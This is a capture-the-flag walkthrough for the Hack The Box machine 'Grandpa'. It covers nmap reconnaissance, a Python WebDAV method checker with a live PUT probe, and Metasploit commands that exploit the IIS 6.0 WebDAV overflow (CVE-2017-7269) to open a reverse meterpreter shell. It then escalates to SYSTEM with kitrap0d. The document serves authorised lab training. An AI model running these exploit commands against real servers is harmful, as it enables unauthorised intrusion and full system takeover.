Grandpa is a fun, beginner-friendly Windows machine on Hack The Box. It requires exploiting a known vulnerability in the web server to gain an initial foothold and then escalating privileges to reach SYSTEM.
Reconnaissance
nmap -A -T4 -p- 10.129.62.143
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-06 21:54 EDT
Nmap scan report for 10.129.62.143
Host is up (0.040s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-webdav-scan:
| Server Date: Fri, 07 Oct 2022 01:56:37 GMT
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Server Type: Microsoft-IIS/6.0
| WebDAV type: Unknown
|_ Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-title: Under Construction
|_http-server-header: Microsoft-IIS/6.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2003|2008|XP|2000 (92%)
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_2000::sp4
Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows Server 2008 Enterprise SP2 (92%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows 2003 SP2 (91%), Microsoft Windows XP SP3 (90%), Microsoft Windows 2000 SP4 or Windows XP Professional SP1 (90%), Microsoft Windows XP (87%), Microsoft Windows Server 2003 SP1 – SP2 (86%), Microsoft Windows XP SP2 or Windows Server 2003 (86%), Microsoft Windows 2000 SP4 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 42.58 ms 10.10.14.1
2 42.67 ms 10.129.62.143
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.02 seconds
- -A: "Aggressive scan" – this switch enables OS detection (-O), version detection (-sV), default script scanning (-sC) and traceroute (--traceroute).
- -T4: This switch sets the timing template of the scan. There are six templates (-T0 through -T5); -T4 is considered aggressive but is generally recommended on a stable broadband or Ethernet connection.
- -p-: This switch will scan all 65,535 possible ports. This will typically be used in all of my initial scans to avoid missing anything on the network. Additionally, you can do a simple port scan and then further enumerate ports that you know are open if time is a factor in your scenario.
We used nmap to scan the target and found that port 80 is the only open port. It is running Microsoft IIS 6.0, the Windows Server 2003 era release, which is very outdated (the current release is IIS 10.0). TRACE is enabled, which can allow Cross-Site Tracing (XST). More importantly, the WebDAV Public Options list advertises PUT, DELETE, COPY, MOVE, MKCOL and PROPPATCH, so unauthenticated file upload may be possible. Note that the Allowed Methods line (the per-resource Allow header for /) does not include PUT, so a method the server advertises is not necessarily usable on every path and is worth verifying directly.
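The nmap script reports two different lists: the server-wide Public header and the per-resource Allow header. The following script, an added example that is not part of the original write-up, parses both, flags the risky methods, and shows which advertised methods are not actually allowed on the scanned path; the live functions take a hypothetical host argument and should only be pointed at a box you are authorised to test. The sample header values are copied from the scan output above.

```python
"""Verify what the nmap http-webdav-scan output actually means.

Added example, not part of the original write-up. Two layers:
  * parse_methods / classify_methods: pure functions that work offline
    on header values (used below on the values from the nmap scan)
  * webdav_options / webdav_put_probe: live checks against a target
    (hypothetical host/port arguments; only run them against a box you
    are authorised to test)
"""
import http.client

# Methods that change server state or help an attacker; TRACE is here
# because it enables Cross-Site Tracing, PROPFIND because it leaks
# directory listings and file properties.
RISKY_METHODS = {
    "PUT", "DELETE", "MOVE", "COPY", "MKCOL", "PROPPATCH",
    "LOCK", "UNLOCK", "TRACE", "SEARCH", "PROPFIND",
}

# Constructed sample: header values copied from the nmap scan above.
SAMPLE_PUBLIC = ("OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, "
                 "MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH")
SAMPLE_ALLOW = "OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK"


def parse_methods(header_value):
    """Split a comma-separated method list (Public: or Allow:) into a set."""
    if not header_value:
        return set()
    return {m.strip().upper() for m in header_value.split(",") if m.strip()}


def classify_methods(public_header, allow_header):
    """Compare the server-wide Public: list with the per-resource Allow: list.

    Returns the risky methods that are really allowed on the resource and
    those the server merely advertises (these still need a direct probe,
    possibly on a different path such as a writable sub-directory).
    """
    public = parse_methods(public_header)
    allow = parse_methods(allow_header)
    return {
        "risky_allowed": sorted(RISKY_METHODS & allow),
        "advertised_only": sorted((RISKY_METHODS & public) - allow),
        "upload_possible": "PUT" in allow,
        "xst_possible": "TRACE" in allow,
    }


def webdav_options(host, port=80, path="/", timeout=5):
    """Live OPTIONS request; returns the (Public, Allow) header values."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("OPTIONS", path)
        resp = conn.getresponse()
        resp.read()
        return resp.getheader("Public", ""), resp.getheader("Allow", "")
    finally:
        conn.close()


def webdav_put_probe(host, port=80, path="/probe_webdav.txt", timeout=5):
    """Live check that PUT really works: upload a harmless text file and
    then DELETE it again. Returns (put_status, delete_status); a 201 on
    PUT means the server accepted an unauthenticated upload."""
    body = b"webdav upload probe\n"
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("PUT", path, body=body,
                     headers={"Content-Type": "text/plain"})
        put = conn.getresponse()
        put.read()
        conn.request("DELETE", path)
        delete = conn.getresponse()
        delete.read()
        return put.status, delete.status
    finally:
        conn.close()


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        # python3 webdav_check.py 10.129.62.143
        public, allow = webdav_options(sys.argv[1])
    else:
        public, allow = SAMPLE_PUBLIC, SAMPLE_ALLOW
    print(classify_methods(public, allow))
```

Run without arguments to evaluate the nmap values offline: PUT, DELETE, MOVE, MKCOL and PROPPATCH come back as advertised only, while TRACE, COPY, PROPFIND, SEARCH, LOCK and UNLOCK are genuinely allowed on /. With a host argument it issues the live OPTIONS request instead; call webdav_put_probe separately if you want to confirm upload on a specific path.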
Researching exploits for IIS 6.0 quickly turns up a great lead from Rapid7: the Metasploit module Microsoft IIS WebDav ScStoragePathFromUrl Overflow (CVE-2017-7269), a buffer overflow in the ScStoragePathFromUrl function of the IIS 6.0 WebDAV service on Windows Server 2003 R2, triggered by an overly long If: header in a PROPFIND request. Because the scan shows PROPFIND is allowed, this target is a good candidate. Launch the module against the target with Metasploit to gain initial access.
Exploitation
msfconsole
use exploit/windows/iis/iis_webdav_scstoragepathfromurl
set lhost <x.x.x.x>
set rhosts <x.x.x.x>
run

Our meterpreter reverse TCP session has spawned, but it runs with the limited privileges of the exploited IIS worker process, so we will need more access to complete this box.
Privilege Escalation
ps

We listed the running processes and found process 1984, which runs as NT AUTHORITY\NETWORK SERVICE. Migrating into this process (migrate 1984) moves us out of the exploited worker process and into one with a usable token, which local privilege escalation exploits need.

Nice! We migrated to process 1984 but still do not have SYSTEM access. The next step is to background the meterpreter session (background) and run Metasploit's local exploit suggester (post/multi/recon/local_exploit_suggester with SESSION set to our session number) to list local exploits the target appears vulnerable to. Check the Architecture line of sysinfo before choosing one: some of these modules, MS10-015 kitrap0d among them, only work against 32-bit Windows.


I’ve had luck with kitrap0d before so that is the privilege escalation exploit that I will try and use.
use exploit/windows/local/ms10_015_kitrap0d
set session 1
set lhost 10.10.14.15
run

Pwned! Good job on exploiting this machine. We now have SYSTEM access and can collect the flags to complete the box. If you enjoyed this machine, be sure to check out Granny, which is very similar.